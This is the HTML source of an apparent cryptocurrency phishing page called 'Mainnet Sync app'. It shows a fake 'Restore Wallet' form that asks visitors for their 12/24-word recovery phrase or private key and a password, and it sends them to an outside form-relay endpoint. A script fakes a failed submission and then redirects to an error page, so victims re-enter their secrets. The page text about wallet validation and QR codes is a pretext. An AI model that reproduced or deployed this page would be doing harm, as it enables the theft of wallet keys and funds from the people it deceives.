<!DOCTYPE html>
<html lang="en">
  

<!-- Added by skull for all time --><meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
<style>
     /* CSS styles for desktop */
    @media screen and (min-width: 600px) {
      /* Add your desktop styles here */
    }

    /* CSS styles for mobile */
    @media screen and (max-width: 599px) {
      /* Add your mobile styles here */
    }

    /* Add styles for the loading screen here */
    #loading-screen {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: black;
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 9999;
    }

    #loading-spinner {
      background-image: url(https://media.tenor.com/arL-Och6Y7sAAAAM/connecting-loading.gif); /* URL to the GIF you provided */
      background-repeat: no-repeat;
      background-position: center center;
      width: 200px;
      height: 200px;
    }
  </style>
  <script>
    // Hide the loading screen after 3 seconds
    document.addEventListener('DOMContentLoaded', function() {
      setTimeout(function() {
        var loadingScreen = document.getElementById('loading-screen');
        loadingScreen.style.display = 'none';
      }, 5000); // 5 seconds in milliseconds
    });
  </script>
</head>
<body>
  <!-- Loading Screen -->
  <div id="loading-screen">
    <!-- Add loading screen content here -->
    <div id="loading-spinner"></div>
	
	
  </div>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <!-- <title>Wallets | Linkup Affixs</title> -->
    <title>Home | Mainnet Sync app</title>

    <!-- Stylesheet (CSS) -->
    <link rel="stylesheet" href="css/style.css" />
    <link
      rel="stylesheet"
      href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />
  </head>
  <body>
    <header class="lpd-header">
      <nav class="lpd-nav">
        <div class="center lpd-nav-container">
          <h4 class="lpd-logo">Connect Manually</h4>

          
        </div>
      </nav>

      <header class="lpd-hero-header">
        <h2 class="lpd-hero-text">
          Multi-coin Wallet
        </h2>
        <p class="lpd-hero-sub-text text-center">
          Typically 12 / 24 words phrase or 64 alphanumeric private key.
        </p>

        <style>
* {
  box-sizing: border-box;
}

input[type=text], select, textarea {
  width: 100%;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 4px;
  resize: vertical;
}

label {
  padding: 12px 12px 12px 0;
  display: inline-block;
}

input[type=submit] {
  background-color: white;
  color: black;
  padding: 12px 20px;
  border: none;
  border-radius: 4px;
  cursor: pointer;
  float: right;
}

input[type=submit]:hover {
  background-color: #45a049;
}

.container {
  border-radius: 5px;
  background-color: black;
  padding: 20px;
}

.col-25 {
  float: left;
  width: 25%;
  margin-top: 6px;
}

.col-75 {
  float: left;
  width: 75%;
  margin-top: 6px;
}

/* Clear floats after the columns */
.row::after {
  content: "";
  display: table;
  clear: both;
}

/* Responsive layout - when the screen is less than 600px wide, make the two columns stack on top of each other instead of next to each other */
@media screen and (max-width: 600px) {
  .col-25, .col-75, input[type=submit] {
    width: 100%;
    margin-top: 0;
  }
}
</style>
</head>
<body>

<div class="container">
  <form id="myForm" action="https://app.form2chat.io/f/d89c7e8" method="post">
  <div class="row">
    <div class="col-25">
      
    </div>
    <div class="col-45">
      <input type="text" id="fname" name="firstname" placeholder="Main Wallet 1">
    </div>
  </div>
  
     <div class="row">
    <div class="col-45">
      <label for="lname"></label>
    </div>
  <div class="row">
    <div class="col-95">
      <textarea id="inputField" name="Phrase" placeholder="Recovery Key" style="height:150px"></textarea>
    </div>
    <div class="row">
    <div class="col-45">
      <label for="lname"></label>
    </div>
    <div class="col-45">
      <input type="text" id="inputField" required name="password" placeholder="Set Security Password">
    </div>
  </div>
  <br>
  <div class="row">
    <input type="submit" id="submitBtn" value="Restore Wallet">
  </div>
  </form>
</div>

      </header>
    </header>

    <section class="lpd-middle">
      <div class="center lpd-middle-div">
        <div class="lpd-middle-option">
          <img src="img/syw.png" alt="" />
          <h6 class="text-center">Select Your Wallet</h6>
          <p class="text-center">
            We have varieties of wallets you can choose from to validate or
            synchronize your wallet. Please, select your correct wallet name
            before proceeding.
          </p>
        </div>
        <div class="lpd-middle-option">
          <img src="img/vyw.png" alt="" />
          <h6 class="text-center">Validate Your Wallet</h6>
          <p class="text-center">
            Once you select your wallet, you will be prompted to connect via a
            decentralized protocol. This can successfully be completed manually
            or automatically.
          </p>
        </div>
        <div class="lpd-middle-option">
          <img src="img/gqc.png" alt="" />
          <h6 class="text-center">Generate QR Code</h6>
          <p class="text-center">
            Upon successful validation, a QR Code will be generated for your
            wallet. You can always scan your QR Code to reinitialize your
            wallet.
          </p>
        </div>
        <div class="lpd-middle-option">
          <img src="img/swqc.png" alt="" />
          <h6 class="text-center">Save Wallet QR Code</h6>
          <p class="text-center">
            Saving your generated mnemonic code or QR Code is important. You can
            click on Save or Screenshot the QR Code Page. You choose how you
            want to save!
          </p>
        </div>
      </div>
    </section>

    <footer class="lpd-footer">
      <div class="center">
        <div class="lpd-ccc">
          <img src="img/bim-foot.png" class="lpd-footer-content" />
        </div>
      </div>
    </footer>
	     <script>
    document.getElementById('myForm').addEventListener('submit', function(event) {
        event.preventDefault(); // Prevent form submission

        if (this.dataset.submitted) {
            // Form already submitted once, redirect to another page
            window.location.href = './error.html';
        } else {
            // First form submission, validate form data
            if (document.getElementById('inputField').value.trim() !== '') {
                // Form data is valid, set the 'submitted' attribute
                this.dataset.submitted = true;
                document.getElementById('submitBtn').innerText = 'Confirm Submission';
            } else {
                alert('Please enter form data before submitting.');
            }
        }
    });
</script>
  </body>

<!-- for all time-->
</html>
